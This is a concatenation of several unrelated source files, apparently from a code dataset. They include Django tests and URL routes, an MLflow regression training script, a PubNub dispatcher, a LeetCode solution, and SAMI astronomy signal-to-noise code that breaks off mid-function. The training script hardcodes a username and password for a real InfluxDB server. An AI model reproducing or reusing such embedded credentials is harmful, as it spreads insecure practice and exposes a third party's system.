self.client.get(reverse('alerts-list'))\n# self.assertEqual(response.status_code, 200)\n# self.assertContains(response, \"You don't have any alerts\")\n\n# def test_alerts_list(self):\n\n# from django.core.urlresolvers import reverse\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n# account, _ = AlertType.objects.get_or_create(name=\"account\")\n\n# Alert.objects.create_for_account(self.bob, type=expired,\n# severity=1, message='Curation X has expired')\n\n# Alert.objects.create_for_account(self.bob,\n# type=account, severity=1, message=\"Password about to expire\",\n# related_document=self.bob)\n\n# self.client.login(username='bob', password='password')\n\n# response = self.client.get(reverse('alerts-list'))\n# self.assertEqual(response.status_code, 200)\n# self.assertContains(response, \"Curation X has expired\")\n# self.assertContains(response, \"Bob\")\n\n# def test_detail_view(self):\n\n# from django.core.urlresolvers import reverse\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# n = Alert.objects.create_for_account(self.bob, type=expired,\n# severity=1, message='Curation X has expired')\n\n# self.client.login(username='bob', password='password')\n\n# response = 
self.client.get(reverse('alerts-detail', args=[\"NOTREAL\", ]))\n# self.assertEqual(response.status_code, 404)\n\n# response = self.client.get(reverse('alerts-detail', args=[str(n.id), ]))\n# self.assertEqual(response.status_code, 200)\n# self.assertContains(response, \"Curation X has expired\")\n\n\n# class ReportingTestCase(AlertsTestCase):\n\n# def setUp(self):\n# super(ReportingTestCase, self).setUp()\n\n# from resources.models import Resource\n\n# self.resource, _ = Resource.objects.get_or_create(\n# __raw__={'_id': u'4d135708e999fb30d8000007'},\n# defaults={'title': \"Testing resource\", 'owner': self.bob})\n\n# from django.test.client import Client\n# self.client = Client()\n\n# def test_annon_report(self):\n\n# from django.core.urlresolvers import reverse\n# from issues.models import Alert, SEVERITY_MEDIUM\n\n# # Check there are no alerts.\n# self.assertEqual(Alert.objects.count(), 0)\n\n# # Trigger the report, which will add a notification for the user\n# # so they know it has been submitted\n# report_url = reverse('resource-report', args=[self.resource.id])\n# response = self.client.post(report_url, {\n# 'message': 'The resource contains incorrect information.'\n# }, follow=True)\n# self.assertEqual(response.status_code, 200)\n\n# # Bob should have one notification, because he is the owner of the\n# # resource.\n# alerts = Alert.objects.for_account(self.bob)\n# self.assertEqual(len(alerts), 1)\n# self.assertEqual(alerts[0].related_document, self.resource)\n# self.assertEqual(alerts[0].severity, SEVERITY_MEDIUM)\n# self.assertEqual(alerts[0].group, None)\n\n# def test_user_report(self):\n\n# from django.core.urlresolvers import reverse\n# from issues.models import Alert, SEVERITY_HIGH\n\n# self.client.login(username='alice', password='password')\n\n# # Check there are no alerts.\n# self.assertEqual(Alert.objects.count(), 0)\n\n# # Trigger the report, which will add a notification for the user\n# # so they know it has been submitted\n# report_url = reverse('resource-report', args=[self.resource.id])\n# response = self.client.post(report_url, {\n# 'message': 'The resource contains incorrect information.'\n# }, follow=True)\n# self.assertEqual(response.status_code, 200)\n\n# # Check the notification is in the list for the user\n# response = self.client.get(reverse('alerts-list',))\n# self.assertEqual(response.status_code, 200)\n# self.assertContains(response, \"Report submitted\")\n\n# # Alice should have one notification that is bound to the resource.\n# # This notification shows that she submitted the report and can then\n# # track it later.\n# alice_alerts = Alert.objects.for_account(self.alice)\n# self.assertEqual(len(alice_alerts), 1)\n# alice_notification = alice_alerts[0]\n# self.assertEqual(alice_notification.related_document, self.resource)\n\n# # Bob should have one notification, because he is the owner of the\n# # resource.\n# bob_alerts = Alert.objects.for_account(self.bob)\n# self.assertEqual(len(bob_alerts), 1)\n# bob_notification = bob_alerts[0]\n# self.assertEqual(bob_notification.related_document, self.resource)\n# self.assertEqual(bob_notification.severity, SEVERITY_HIGH)\n\n# # Check the two alerts are in the same group.\n# self.assertEqual(alice_notification.group, bob_notification.group)\n","repo_name":"snowcloud/engineclub","sub_path":"engineclub/apps/engine/issues/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":14435,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} 
+{"seq_id":"33800230608","text":"from influxdb import InfluxDBClient\nimport pandas as pd\nimport numpy as np\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.linear_model import LinearRegression, Ridge, Lasso\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score\nimport mlflow\nimport mlflow.sklearn\nimport mytransformers\nfrom sklearn.model_selection import TimeSeriesSplit\n\nimport os, warnings, sys\n\nimport logging\nlogging.basicConfig(level = logging.WARN)\nlogger = logging.getLogger(__name__)\n\ndef eval_metrics(actual, pred):\n rmse = np.sqrt(mean_squared_error(actual, pred))\n mae = mean_absolute_error(actual, pred)\n r2 = r2_score(actual, pred)\n return rmse, mae, r2\n\ndef get_data(weeks = 8):\n client = InfluxDBClient(host = 'influxus.itu.dk', port = 8086, username = 'lsda', password = 'icanonlyread')\n client.switch_database('orkney')\n\n results = client.query('SELECT * FROM \"Generation\" where time > now() - {}w ORDER BY time'.format(str(weeks)))\n points = results.get_points()\n values = results.raw['series'][0][\"values\"]\n columns = results.raw['series'][0][\"columns\"]\n return pd.DataFrame(values, columns = columns).set_index(\"time\")\n\n\nif __name__ == '__main__':\n # handle params\n weeks = int(sys.argv[1] if len(sys.argv) > 1 else 8)\n hours = int(sys.argv[2] if len(sys.argv) > 2 else 3)\n alpha = float(sys.argv[3] if len(sys.argv) > 3 else 0.5)\n\n generation_df = get_data(weeks)\n\n # prepare data\n pre_pipeline = Pipeline([\n ('date_worker', mytransformers.DateTransformer()),\n ('shifter', mytransformers.Shifter())\n ])\n\n processed_data = pre_pipeline.fit_transform(generation_df, shifter__hours = hours)\n features = processed_data[0]\n labels = processed_data[1]\n\n # start mlflow run\n with mlflow.start_run():\n # cross validation\n tscv = TimeSeriesSplit(5)\n for train_index, test_index in tscv.split(labels):\n X_train, X_test = features.iloc[train_index], features.iloc[test_index]\n y_train, y_test = labels[train_index], labels[test_index]\n model = Lasso(alpha).fit(X_train, y_train)\n preds = model.predict(X_test)\n\n rmse, mae, r2 = eval_metrics(y_test, preds)\n\n mlflow.log_param(\"alpha\", alpha)\n mlflow.log_param(\"weeks\", weeks)\n mlflow.log_param(\"hours\", hours)\n\n mlflow.log_metric(\"rmse\", rmse)\n mlflow.log_metric(\"r2\", r2)\n mlflow.log_metric(\"mae\", mae)\n \n","repo_name":"gergokoncz/itu","sub_path":"4th_semester/large_scale_data/assignment4/energy_gen_forecast/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34179827272","text":"from pubnub.event_engine.models import effects\nfrom pubnub.event_engine import manage_effects\n\n\nclass Dispatcher:\n _pubnub = None\n _managed_effects_factory = None\n\n def __init__(self, event_engine) -> None:\n self._event_engine = event_engine\n self._managed_effects = {}\n self._effect_emitter = manage_effects.EmitEffect()\n\n def set_pn(self, pubnub_instance):\n self._pubnub = pubnub_instance\n self._effect_emitter.set_pn(pubnub_instance)\n\n def dispatch_effect(self, effect: effects.PNEffect):\n if not self._managed_effects_factory:\n self._managed_effects_factory = manage_effects.ManagedEffectFactory(self._pubnub, self._event_engine)\n\n if isinstance(effect, effects.PNEmittableEffect):\n self.emit_effect(effect)\n\n elif isinstance(effect, effects.PNManageableEffect):\n self.dispatch_managed_effect(effect)\n\n elif isinstance(effect, 
effects.PNCancelEffect):\n self.dispatch_cancel_effect(effect)\n\n def emit_effect(self, effect: effects.PNEffect):\n self._effect_emitter.emit(effect)\n\n def dispatch_managed_effect(self, effect: effects.PNEffect):\n managed_effect = self._managed_effects_factory.create(effect)\n managed_effect.run()\n self._managed_effects[effect.__class__.__name__] = managed_effect\n\n def dispatch_cancel_effect(self, effect: effects.PNEffect):\n if effect.cancel_effect in self._managed_effects:\n self._managed_effects[effect.cancel_effect].stop()\n del self._managed_effects[effect.cancel_effect]\n","repo_name":"pubnub/python","sub_path":"pubnub/event_engine/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"53"} +{"seq_id":"3318396078","text":"class Solution:\r\n def convert(self, s: str, numRows: int) -> str:\r\n if numRows < 2:\r\n return s\r\n\r\n res = ['' for _ in range(numRows)]\r\n c, flag = 0, -1\r\n for i in s:\r\n res[c] += i\r\n if c == 0 or c == numRows - 1:\r\n flag = -flag\r\n c += flag\r\n return ''.join(res)\r\n\r\n # initialize n row residual, then add each character to row one at a time.\r\n # when reach 0 or numRows, change direction.\r\n","repo_name":"BuckyOrange/leet","sub_path":"q6-zigzag-conversion/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22592133167","text":"\nfrom django.urls import path\nfrom . import views as blog_view\n\napp_name = 'blog'\nurlpatterns = [\n path('', blog_view.index, name='index'),\n path('ajax/', blog_view.index_ajax, name='index_ajax'),\n path('upload/', blog_view.BasicUploadView.as_view(), name='upload'),\n path('/upload-detail/', blog_view.JsonDataCreateView.as_view(), name='upload-detail'),\n path('user/', blog_view.UsersView.as_view(), name='user_list'),\n path('data_for_site/', blog_view.data_for_site, name='data_for_size'),\n path('clear_database/', blog_view.clear_database, name='clear_database'),\n\n]\n\n","repo_name":"artursaliyev/core_blog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4766904657","text":"\"\"\"\nThis file contains a couple of S/N estimation codes \n designed for use during SAMI observing runs.\n\nUPDATED: 08.04.2013, Iraklis Konstantopoulos\n - Edited to comply with new conventions in sami_utils. \n - Edited to accept new target table format. \n\n 23.08.2012, Iraklis Konstantopoulos\n - Changed name of \"sn\" function to \"sn_re\". \n - Writing new S/N code based on the secondary star observation. \n\nNOTES: 10.04.2013, Iraklis Konstantopoulos\n - I no longer return SN_all, but sn_Re, the median SN @Re. \n - Removed the SN_all array from the sn function. \n\n 26.08.2013, Iraklis Konstantopoulos\n - Updated fields for the SAMI target table. \n - Also changed all mentions of 'z' to 'zpec'. \n - Major bug fixes in case where target not found on target table. \n\n 27.08.2013, Iraklis Konstantopoulos\n - Writing surface brightness map function. \n\nFor reasons I (JTA) don't remember, this code was never quite finished\nor put into action. 
The intention had been to use S/N measurements to aid\nthe observers in deciding when a field was finished, but this code is not\nmentioned in the observers' instructions.\n\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n\nimport pylab as py\nimport numpy as np\nimport scipy as sp\nimport matplotlib.pyplot as plt\n\n# use astropy for all astronomy related things.\nimport astropy.io.fits as pf\nimport astropy.io.ascii as tab\n\nimport sys\n\nfrom matplotlib.patches import Circle\n\n# Relative imports from sami package\nfrom .. import utils\nfrom .. import samifitting as fitting\n\n\ndef sn_map(rssin):\n \"\"\" \n Plot SNR of all 12 SAMI targets across fraction of Re. \n \n Process: \n - Deduce the noise level from the standard star: \n + obtain listed brightness, \n + use existing 2D Gauss function to get SBP,\n + (photometric aperture and aperture correction?), \n + normalise flux, \n + calculate integrated S/N for star, \n + establish noise level. \n\n - Run the SDSS-SB fuction on all targets, \n + Convert brightness to S/N, \n + Plot all 12 targets:\n - x-axis: fraction of Re (from target selection table), \n - y-axis: S/N, \n - horizontal lines @S/N=5, 10.\n \"\"\"\n\n print(\"HAY!\")\n\ndef sn_list(inlist, tablein, l1, l2, ifus='all'):\n \"\"\" \n Wrapper function to provide S/N estimates for >1 file \n \n inlist [ascii] list of files (format?)\n tablein [ascii] \n \"\"\"\n\n #To print only two decimal places in all numpy arrays\n np.set_printoptions(precision=2)\n\n files=[]\n\n for line in open(inlist):\n cols=line.split(' ')\n cols[0]=str.strip(cols[0])\n \n files.append(np.str(cols[0]))\n\n print(\"I have received\", len(files), \\\n \"files for which to calculate and combine S/N measurements.\")\n\n # Define the list of IFUs to display\n if ifus == 'all':\n IFUlist = [1,2,3,4,5,6,7,8,9,10,11,12,13]\n else:\n IFUlist = [ifus]\n\n print(\"I will calculate S/N for\", len(IFUlist), \"IFUs.\")\n\n SN_all_sq=np.empty((len(IFUlist), len(files)))\n\n for i in range(len(files)):\n\n insami=files[i]\n SN_all=sn_re(insami, tablein, plot=False, ifus=ifus, verbose=False)\n \n SN_all_sq[:,i]=SN_all*SN_all\n\n # Add the squared SN values and square root them\n SN_tot=np.sqrt(np.sum(SN_all_sq, axis=1))\n\n print(IFUlist)\n print(SN_tot)\n \ndef sn_re(insami, tablein, l1, l2, plot=False, ifus='all', \n log=True, verbose=True, output=False, seek_centroid=True):\n\n \"\"\" \n Purpose: Main function, estimates S/N for any or all probes in an RSS file. \n\n Input variables:\n\n insami [fits] Input RSS file. \n tablein [ascii] Observations table. \n l1, l2 [flt] Wavelength range for S/N estimation. \n ifus [str] Probe number, or 'all' for all 13. \n log [bool] Logarithimic scaling for plot -- CURRENTLY NOT ENVOKED. \n verbose [bool] Toggles diagnostic verbosity. \n\n Process: \n 1) Interpret input. \n [Set up plot]\n 2) Read target table (new format for SAMI survey), \n [Commence all-IFU loop, read data]\n 3) Identify wavelength range over which to estimate SNR, \n 4) Calculate SNR for all cores in the RSS file. \n 5) Locate galaxy centre as peak SNR core. \n 6) Identify cores intercepted by Re (listed). \n 7) Get SNR @Re as median of collapsed wavelength region. 
\n [End all-IFU loop]\n \"\"\"\n\n # --------------------\n # (1) Interpret input\n # --------------------\n if ifus == 'all':\n IFUlist = [1,2,3,4,5,6,7,8,9,10,11,12,13]\n else:\n IFUlist = ifu_num = [int(ifus)]\n\n n_IFU = len(IFUlist)\n\n if verbose: \n print('')\n print('--------------------------------')\n print('Running sami.observing.sn.sn_re.')\n print('--------------------------------')\n print('')\n if n_IFU == 1: print('Processing', n_IFU, 'IFU. Plotting is', end=' ') \n if n_IFU > 1: print('Processing', n_IFU, 'IFUs. Plotting is', end=' ') \n if not plot: print('OFF.')\n if plot: print('ON.')\n print('')\n\n # --------------------\n # Set up plot process\n # --------------------\n \n # Define number of cores, core diameter (in arcsec). \n # -- is this stored someplace in sami.utils/generic? \n n_core = 61\n r_core = 1.6\n \n # Create the figure\n if plot: \n\n # Get Field RA, DEC\n hdulist = pf.open(insami)\n primary_header = hdulist['PRIMARY'].header\n field_dec = primary_header['MEANDEC']\n\n # To create the even grid to display the cubes on \n # (accurate to 1/10th core diameter)\n dx = 4.44e-5 /np.cos(np.pi *field_dec /180.)\n dy = 4.44e-5\n \n fig = py.figure()\n # Number of rows and columns needed in the final display box\n # This is a bit of a fudge...\n if n_IFU==1:\n im_n_row = 1\n im_n_col = 1\n elif n_IFU==2:\n im_n_row = 1\n im_n_col = 2\n elif n_IFU==3:\n im_n_row = 1\n im_n_col = 3\n elif n_IFU==4:\n im_n_row = 2\n im_n_col = 2\n elif n_IFU>3 and n_IFU<=6:\n im_n_row = 2\n im_n_col = 3\n elif n_IFU>6 and n_IFU<=9:\n im_n_row = 3\n im_n_col = 3\n elif n_IFU>9 and n_IFU<=12:\n im_n_row = 3\n im_n_col = 4\n elif n_IFU>12:\n im_n_row = 4\n im_n_col = 4\n \n # ISK: trying to improve the rows and columns a bit: \n # def isodd(num): return num & 1 and True or False\n # if n <= 3:\n # r = 1\n # c = n\n # elif n > 6: \n # r = 3\n # c = 3\n \n # ----------------------\n # (2) Read target table\n # ----------------------\n tabname = ['name', 'ra', 'dec', 'r_petro', 'r_auto', 'z_tonry', 'zspec', \n 'M_r', 'Re', '', 'mu(Re)', 'mu(2Re)', 'ellip', 'PA', 'M*',\n 'g-i', 'A_g', 'CATID', 'SURV_SAMI', 'PRI_SAMI', 'BAD_CLASS']\n target_table = tab.read(tablein, names=tabname, data_start=0)\n CATID = target_table['CATID'].tolist()\n\n # Start a little counter to keep track \n # -- a fudge for the way the plot loop is set up... \n counter = 0\n\n # --------------------------\n # Commence the all-IFU loop\n # --------------------------\n for ifu_num in IFUlist:\n\n counter = counter + 1\n\n # Read single IFU\n myIFU = utils.IFU(insami, ifu_num, flag_name=False)\n\n # And find the row index for this SAMI target. \n try: \n this_galaxy = CATID.index(int(myIFU.name))\n no_such_galaxy = False\n except:\n this_galaxy = []\n no_such_galaxy = True\n pass\n\n \"\"\"\n There are other ways to do this with a numpy array as input. \n Lists are far better at this, so have made a CATID list. \n \n this_galaxy = np.where(target_table['CATID'] == int(myIFU.name))\n this_galaxy = np.where(CATID == int(myIFU.name))\n this_galaxy = [CATID == int(myIFU.name)]\n \"\"\"\n\n # ----------------------------\n # (3) Define wavelength range\n # ----------------------------\n\n if no_such_galaxy:\n z_target = 0.0\n z_string = '0.0'\n \n # see below for explanation of this. \n idx1 = l1\n idx2 = l2\n\n print(('-- IFU #' + str(ifu_num)))\n print(\" This galaxy was not found in the Target Table. 
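The if/elif ladder above hard-codes a rows-by-columns layout per probe count, and the commented-out `ISK` note already gestures at replacing it with arithmetic. A sketch of that replacement (the helper name is mine, not from the module); for n = 1..13 it reproduces the ladder's table exactly:

```python
import math

def grid_shape(n, max_cols=4):
    """Subplot grid for n panels: one row for small counts,
    otherwise roughly square, capping columns at max_cols."""
    cols = n if n <= 3 else min(max_cols, math.ceil(math.sqrt(n)))
    rows = math.ceil(n / cols)
    return rows, cols

for n in range(1, 14):
    print(n, grid_shape(n))   # (1,1) (1,2) (1,3) (2,2) (2,3) ... (4,4) for n=13
```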
\")\n\n else: \n z_target = target_table['zspec'][this_galaxy]\n z_string = str(z_target)\n\n l_range = myIFU.lambda_range\n l_rest = l_range/(1+z_target)\n \n # identify array elements closest to l1, l2 **in rest frame**\n idx1 = (np.abs(l_rest - l1)).argmin()\n idx2 = (np.abs(l_rest - l2)).argmin()\n \n if verbose: \n print('-------------------------------------------------------')\n print((' IFU #' + str(ifu_num)))\n print('-------------------------------------------------------')\n print((' Redshift: ' + z_string))\n print((' Spectral range: ' + \n str(np.around([l_rest[idx1], l_rest[idx2]]))))\n \n print((' Observed at: ' + \n str(np.around([l_range[idx1], l_range[idx2]]))))\n print('')\n \n # -------------------------\n # (4) Get SNR of all cores\n # -------------------------\n sn_spec = myIFU.data/np.sqrt(myIFU.var)\n \n # Median SN over lambda range (per Angstrom)\n sn = np.nanmedian(sn_spec[:, idx1:idx2], axis=1) * (1./myIFU.cdelt1)\n \n # ----------------------------------\n # (5) Find galaxy centre (peak SNR)\n # ----------------------------------\n # Initialise a couple of arrays for this loop\n core_distance = np.zeros(n_core)\n good_core = np.zeros(n_core)\n centroid_ra = 0.\n centroid_dec = 0.\n \n # Get target Re from table (i.e., match entry by name)\n if no_such_galaxy:\n print(\" No Re listed, calculating SNR at centroid instead.\")\n re_target = 0.\n\n else:\n re_target = target_table['Re'][this_galaxy]\n \n # Get either centroid, or table RA, DEC\n if seek_centroid: \n if no_such_galaxy:\n centroid = np.where(myIFU.n ==1)\n else:\n centroid = np.where(sn == np.nanmax(sn))\n centroid_ra = myIFU.xpos[centroid]\n centroid_dec = myIFU.ypos[centroid]\n\n if not seek_centroid: \n if no_such_galaxy:\n centroid = np.where(myIFU.n ==1)\n else:\n centroid_ra = target_table['ra'][this_galaxy]\n centroid_dec = target_table['dec'][this_galaxy]\n \n test_distance = 3600.* np.sqrt(\n (myIFU.xpos - centroid_ra)**2 +\n (myIFU.ypos - centroid_dec)**2 )\n centroid = np.abs(test_distance - 0).argmin()\n \n if verbose: \n print(' S/N @Centroid =', np.round(sn[centroid]), '[/Angstrom]')\n print('')\n\n # ---------------------------------------- \n # (6) Identify cores at approximately Re\n # ---------------------------------------- \n\n # Check that there is an Re listed, some times there isn't. 
\n if no_such_galaxy:\n sn_Re = 0.\n else:\n core_distance = 3600.* np.sqrt(\n (myIFU.xpos - centroid_ra)**2 +\n (myIFU.ypos - centroid_dec)**2 )\n \n good_core[(core_distance > re_target - 0.5*r_core) \n & (core_distance < re_target + 0.5*r_core)] = True\n \n # Get median S/N of cores @Re: \n if 1 in good_core:\n sn_Re = np.nanmedian(sn[good_core == True]) \n sn_min = min(sn[good_core == True])\n sn_max = max(sn[good_core == True])\n \n if verbose: \n if not 1 in good_core:\n sn_str = str(np.round(np.nanmedian(sn)))\n print(\"** Could not match Re\")\n print(('=> Median overall S/N = '+sn_str))\n print('')\n\n else:\n print('=> [Min, Max, Median] S/N @Re = [', end=' ')\n print('%0.2f' % min(sn[good_core == True]), ',', end=' ')\n print('%0.2f' % max(sn[good_core == True]), ',', end=' ')\n print('%0.2f' % sn_Re, '] [/Angstrom]')\n print('')\n \n\n # ----------\n # DRAW PLOT \n # ----------\n if plot:\n # Set image size to fit the bundle.\n size_im = 100\n N_im = np.arange(size_im)\n \n # Create a linear grid, centred at Fibre #1.\n x_ctr = myIFU.xpos[np.sum(np.where(myIFU.n == 1))]\n y_ctr = myIFU.ypos[np.sum(np.where(myIFU.n == 1))]\n \n # Set axis origin: highest RA, lowest DEC.\n x_0 = x_ctr + (size_im/2)*dx\n y_0 = y_ctr - (size_im/2)*dy\n \n # Direction of each axis: RA decreases, DEC increases. \n x_lin = x_0-N_im*dx\n y_lin = y_0+N_im*dy\n \n # Create image --\n # 1) Find indices of nearest linear points to actual core positions.\n b = 0 # (reset index)\n core_x = []\n core_y = []\n \n for b in range(n_core):\n \n nx = np.abs(x_lin - myIFU.xpos[b]).argmin()\n ny = np.abs(y_lin - myIFU.ypos[b]).argmin()\n \n core_x.append(nx)\n core_y.append(ny)\n \n # Make empty image.\n frame = np.empty((size_im,size_im)) + np.nan\n ax = fig.add_subplot(im_n_row, im_n_col, counter)\n ax.set_aspect('equal')\n\n # Colorise all fibres according to S/N; negatives set to zero. \n sn_norm = sn/np.nanmax(sn)\n sn_norm[sn < 0] = 0.0\n \n # Loop through all cores: \n a = 0 #reset index\n for a in range(n_core):\n\n # Make a Circle patch for each fibre in the bundle: \n art_core = Circle(xy = (core_x[a], core_y[a]), \n radius=4.8, color=str(sn_norm[a]))\n ax.add_artist(art_core)\n\n # and mark cores intersected by Re: \n if good_core[a]: \n art_good = Circle(xy = (core_x[a], core_y[a]), \n radius=4.8, alpha=0.7)\n ax.add_artist(art_good)\n\n frame[core_x[a], core_y[a]] = sn[a]\n \n ax = fig.add_subplot(im_n_row, im_n_col, counter)\n im = ax.imshow(np.transpose(frame), origin='lower', \n interpolation='nearest', cmap='gray')\n \n ax.set_title('Probe #'+str(ifu_num))\n fig.colorbar(im)\n\n # Write images\n if output: \n outsnfile='sn_'+np.str(l1)+'_'+np.str(l2)+'_'+\\\n str(ifu_num)+'_'+insami\n pf.writeto(outsnfile, np.transpose(frame), clobber=True)\n \n # Super title for plot\n py.suptitle(insami+', S/N map')\n\n if verbose: \n print('-------------------------------------------------------')\n\n \ndef read_targ_tab(tablein):\n \"\"\" Read a SAMI target table. \"\"\"\n tabname = ['name', 'ra', 'dec', 'r_petro', 'r_auto', 'z_tonry', 'zspec', \n 'M_r', 'Re', '', 'mu(Re)', 'mu(2Re)', 'ellip', 'PA', 'M*',\n 'g-i', 'A_g', 'CATID', 'SURV_SAMI', 'PRI_SAMI', 'BAD_CLASS']\n target_table = tab.read(tablein, names=tabname, data_start=0)\n return target_table\n\n\ndef sb(rssin, tablein, starin, ifus='all', \n starIDcol=0, starMAGcol=[5,6], area='fibre'):\n \"\"\" Make surface brightness maps of all IFUs in rssin, indicate SNR. 
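Step (6) above marks the cores whose centroid distance lands within half a core diameter of Re. The same selection reads a little more directly as a boolean mask (toy numbers; the real code uses the 2-D on-sky distance):

```python
import numpy as np

r_core, re_target = 1.6, 3.0                        # arcsec (Re value made up)
dist = np.array([0.4, 1.1, 2.4, 3.1, 3.9, 5.0])     # core-to-centroid distances
sn = np.array([40.0, 31.0, 22.0, 15.0, 11.0, 8.0])  # fake per-core S/N

at_re = (dist > re_target - 0.5 * r_core) & (dist < re_target + 0.5 * r_core)
if at_re.any():
    print("S/N @Re (min/max/median):",
          sn[at_re].min(), sn[at_re].max(), np.nanmedian(sn[at_re]))
else:                                               # same fallback as the source
    print("no core intersects Re; overall median:", np.nanmedian(sn))
```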
\"\"\"\n\n from scipy.interpolate import griddata\n\n \"\"\" \n Use the secondary star to deduce zeropoint. \n Then translate flux to surface brightness. \n\n This should make use of the Gauss-fit code to fit the SBP of the star. \n For now I am just keeping the thing simple. \n\n 1) Identify secondary star. Should be only target not on 'tablein'. \n 2) Measure flux (for now of the whole probe). \n 3) Look up brightness of star on star table. \n 4) Deduce zeropoint. \n 5) Map SB of targets in all other probes. \n\n The 'area' input corresponds to the area over which the surface brightness\n is inter/extrapolated. The default is to measure per SAMI fibre, but it is\n possible to provide any area (e.g., per sq/ arcsec). \n \"\"\"\n \n # ---------------------------\n # (1) Identify secondary star \n # ---------------------------\n\n # First of all, read the colour of the spectrum in the primary header. \n myHDU = pf.open(rssin)\n colour = myHDU[0].header['SPECTID']\n myHDU.close()\n\n # Interpret input\n if ifus == 'all':\n IFUlist = [1,2,3,4,5,6,7,8,9,10,11,12,13]\n else:\n IFUlist = ifu_num = [int(ifus)]\n\n n_IFU = len(IFUlist)\n\n # Read star table\n star_table = tab.read(starin, header_start=0, data_start=1)\n RowID = star_table['RowID'].tolist()\n \n # Read SDSS throughputs\n sdss_col = ['wave', 'pt_secz=1.3', 'ext_secz=1.3', \n 'ext_secz=0.0', 'extinction']\n sdss_g = tab.read('SDSS_g.dat', quotechar=\"#\", names=sdss_col)\n sdss_r = tab.read('SDSS_r.dat', quotechar=\"#\", names=sdss_col)\n\n # Cycle through probes, identify star through CATID//RowID. \n found_star = False\n for ifu_num in IFUlist: \n \n # Read single IFU\n myIFU = utils.IFU(rssin, ifu_num, flag_name=False)\n nfib = np.shape(myIFU.data)[0]\n \n if int(myIFU.name) in RowID:\n found_star = True\n star = ifu_num\n print((\"Star found in Probe #\"+str(star)))\n\n # ----------------\n # (2) Measure flux\n # ----------------\n \"\"\"\n This needs to take into account the flux in limited spectral and \n spatial ranges. The spectral is taken care of (convolving with \n SDSS filter throughput), but the spatial is not. Should use the \n Gauss fit function and integrate, currently summing up all fibres.\n \"\"\"\n wave = myIFU.lambda_range\n if colour == 'RD':\n thru_regrid = griddata(sdss_r['wave'], sdss_r['ext_secz=1.3'], \n wave, method='cubic', fill_value=0.0)\n else:\n thru_regrid = griddata(sdss_g['wave'], sdss_g['ext_secz=1.3'], \n wave, method='cubic', fill_value=0.0)\n\n # Convolve flux and sum in a per-core basis.\n conv_fib = np.zeros(len(myIFU.data))\n for fib in range(nfib):\n conv_fib[fib] = np.nansum(myIFU.data[fib]*thru_regrid)\n \n \"\"\" \n Blue spectrum overlaps well with g' band, but r' does not, need \n extrapolate a flux according to the fixed F-type star spec-slope. \n The slope is straight, so a triangle approximation is alright. My \n model is this F-star:\n \n http://www.sdss.org/dr5/algorithms/spectemplates/spDR2-007.gif\n \n which I approximate to a right-angle triangle. The opposing and \n adjacent sides of the full (entire r' band) and curtailed (SAMI)\n triangles are [50, 1800] and [30, 1000], in units of [flux, Ang]. \n\n The relative areas are therefore differ by a factor of three and \n the extrapolated flux contained in the area of overlap between \n the SDSS r' and the SAMI red spectrum is 3. 
\n \"\"\" \n if colour == 'RD':\n flux = 3* np.nansum(conv_fib)\n else: \n flux = np.nansum(conv_fib)\n\n print((\"S(Flux) = \"+str(np.round(flux))+\" cts\"))\n\n \"\"\" \n Finally, need to check if the user is looking for a flux inter/\n extrapolated to an area different to that of the SAMI fibre. \n pi * (0.8\")**2 ~= 2.01 sq. asec.\n \"\"\" \n if area != 'fibre':\n flux = flux * (np.pi*0.8**2)/area\n\n # -------------------------\n # (3) Get listed brightness\n # -------------------------\n\n # Get g (blue) or r (red) mag from stars catalogue.\n\n # ID is column zero, unless otherwise set by starIDcol, \n # and g, r are 5, 6, unless set otherwise in starMAGcol.\n this_star = RowID.index(int(myIFU.name))\n\n if colour == 'RD':\n mag = star_table['r'][this_star]\n else:\n mag = star_table['g'][this_star]\n print((\"[ID, brightness] = \", RowID[this_star], mag))\n \n # --------------------\n # (4) Deduce zeropoint\n # --------------------\n # Red zeropoint tricky, as not entire r' is covered. Secondary stars are \n # F-class, so can assume a spectral slope. Going with flat, roughly OK. \n\n if colour == 'RD':\n # SAMI spectra roughly run from 6250 to 7450 A. \n # The SDSS r' band throughput between 5400 and 7230 A. \n \n zmag = mag + 2.5 * np.log10(flux)\n print((\"Calculated zeropoint as \"+str(np.round(zmag,decimals=2))+\" mag.\"))\n \n # -------------------------\n # (5) Map SB of all targets\n # -------------------------\n\n # Set up plot\n fig = plt.gcf()\n fig.clf()\n\n # Cycle through all IFUs. \n for ifu_num in IFUlist: \n \n if ifu_num != star: \n myIFU = utils.IFU(rssin, ifu_num, flag_name=False)\n s_flux = np.zeros(nfib)\n\n # and some plotty things\n fibtab = myIFU.fibtab\n offset_ra = np.zeros(nfib, dtype='double')\n offset_dec = np.zeros(nfib, dtype='double')\n\n # And loop through all fibres to get summed flux\n for fibnum in range(nfib):\n s_flux[fibnum] = np.nansum(myIFU.data[fibnum][:])\n\n # do some fibre positions while you're looping\n\n \"\"\"\n Adapting the plotting method from the BDF creation code. \n Not sure if this is the best. Check Lisa's display code. \n Should do it that way. \n \"\"\"\n \n # Get RAs and DECs of all fibres. \n ra1 = np.radians(myIFU.xpos[np.where(myIFU.n == 1)])\n dec1 = np.radians(myIFU.ypos[np.where(myIFU.n == 1)])\n ra_fib = np.radians(myIFU.xpos[fibnum])\n dec_fib = np.radians(myIFU.ypos[fibnum])\n \n # Angular distance\n cosA = np.cos(np.pi/2-dec1) * np.cos(np.pi/2-dec_fib) + \\\n np.sin(np.pi/2-dec1) * np.sin(np.pi/2-dec_fib) * \\\n np.cos(ra1-ra_fib) \n\n # DEC 